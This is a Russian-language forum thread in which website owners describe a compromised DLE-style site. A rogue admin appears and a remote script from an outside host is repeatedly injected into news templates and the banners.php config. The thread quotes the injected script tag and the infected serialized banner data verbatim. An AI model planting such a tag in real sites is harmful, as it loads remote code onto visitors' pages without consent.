Может нам это через icq или скайп связатся?
А где смотреть логи хостинга?
Написал целое объяснение но что то оно не появилось.
В краце.
Пароли к хостингу, фтп, бд меняли? На компьютере антивирус стоит? Логи хостинга смотрели? Дополнительные модули стоят на сайте?
пароли менял, фТп, бд менял, на компе NOD32, Логи в смысле (Список действий в админпанели) смотрел без изменений. Пару модулей стоит.
Пароли менял, фтп, бд менял, на компе nod32? (Логи хостинга смотрели? - Список действий в админпанели это имеете ввиду? - там ничего все входы с моего IP ) да пару модудей есть.
История такая. Всё было около года нормально. недавно где то неделю, может две, Захожу с другого браузера на сайт а там всё в пор.нухе, блин начал копать нашол в краткой и полной новости вот это:
[group=4,5]<script language='javascript' charset='UTF-8' type='text/javascript' src='http://ppadman.ru/5s5nppui13q7xpgehmd8usu1ssrzot1'></script>[/group]
Удалил.
Спустя пару дней, Работаю под своим профилем, бах смотрю появляется какой то второй админ что то типа (pod056 или comd0089) точно не помню, не до этого было. Сразу в лог действий кинулся там ничего, потом по пользователям начал искать нету. и после появился скрипт, но работает только когда я выхожу из профиля и в краткой новости.
Пока спасаюсь заменой engine, но при этом не могу войти в профиль админа а то снова выскочит.
Тут вот в чём засада:
Нормальный banners.php
a:1:{i:1;a:13:{s:2:"id";s:1:"1";s:10:"banner_tag";s:6:"header";s:5:"descr";s:14:"Верхний баннер";s:4:"code";s:199:"<div align="center"><a href="http://www.mid-team.ws/" title="M.I.D Team" target="_blank"><img src="http://сайт/templates/Default/images/_banner_.gif" style="border: none;" alt="" /></a></div>";s:7:"approve";s:1:"1";s:11:"short_place";s:1:"0";s:6:"bstick";s:1:"0";s:4:"main";s:1:"0";s:8:"category";s:1:"0";s:10:"grouplevel";s:3:"all";s:5:"start";s:0:"";s:3:"end";s:0:"";s:5:"fpage";s:1:"0";}}
А вот что происходит когда я выхожу из своего аккаунта профиля или время подходит:
a:2:{i:1;a:13:{s:2:"id";s:1:"1";s:10:"banner_tag";s:6:"header";s:5:"descr";s:14:"Верхний баннер";s:4:"code";s:199:"<div align="center"><a href="http://www.mid-team.ws/" title="M.I.D Team" target="_blank"><img src="http://сайт/templates/Default/images/_banner_.gif" style="border: none;" alt="" /></a></div>";s:7:"approve";s:1:"1";s:11:"short_place";s:1:"0";s:6:"bstick";s:1:"0";s:4:"main";s:1:"0";s:8:"category";s:1:"0";s:10:"grouplevel";s:3:"all";s:5:"start";s:0:"";s:3:"end";s:0:"";s:5:"fpage";s:1:"0";}i:2;a:13:{s:2:"id";s:1:"2";s:10:"banner_tag";s:6:"center";s:5:"descr";s:10:"centerclic";s:4:"code";s:134:"<script language='javascript' charset='UTF-8' type='text/javascript' src='http://ppadman.ru/5s5nppui13q7xpgehmd8usu1ssrzot1'></script>";s:7:"approve";s:1:"1";s:11:"short_place";s:1:"7";s:6:"bstick";s:1:"1";s:4:"main";s:1:"0";s:8:"category";s:1:"0";s:10:"grouplevel";s:3:"4,5";s:5:"start";s:0:"";s:3:"end";s:0:"";s:5:"fpage";s:1:"0";}}
Что делать где его искать непонятно, если можешь что подсказать буду признателен!
Ды вот.
Делаю полную проверку айболитом, нужно найти где сидит. а то сейчас после 24 пор.уха полезет.
Нифега не пойму что мне айболит показывает. Просидел пять часов, вроди всё убрал тут бах в 23-00 опять появился не знаю что делать у меня мало опыта в этом. Если есть у кого желание поглядеть проблему и помочь буду очень признателен.
А каким антивирусом? Пробовал AI-Bolit что то он мне много всего выдал, знать бы ещё где зараза сидит, поменял папку engine и своего шаблона, по входил и выходил всё думал, фига снова появился. Буду ещё AI-Bolit пробовать---------- Добавлено 12.02.2014 в 17:24 ----------Может кто по опытнее есть и поможет мне
Добрый день!!
А что дальше проблема решена?
У меня на сайт тоже какой то левый админ проник поставил скрипт и не знаю что делать.
Кто ни будь может помочь, всю голову сломал.
Вот что происходит:
После того как было проникновение проверил лог действий, там всё без изменений!
Дальше больше нашёл скрипт в исходном коде странице, а удалить не удалось в .tpl его нет.
Тогда сделал следующее, удалил полностью папку engine, и поставил с копии, вроди бы всё заработало и скрипт пропал, проверил banners.php чистый.
Но вот в чём засада, как только я ввожу в свой админ-пароль и логин, всё остаётся как было ни чего не меняется, но стоит мне выйти воаля скрипт снова прописывается и в banners.php появляется сам... Что делать дыже не знаю !!!!
ОЧЕНЬ НУЖНА ПОМОЩЬ!!!!
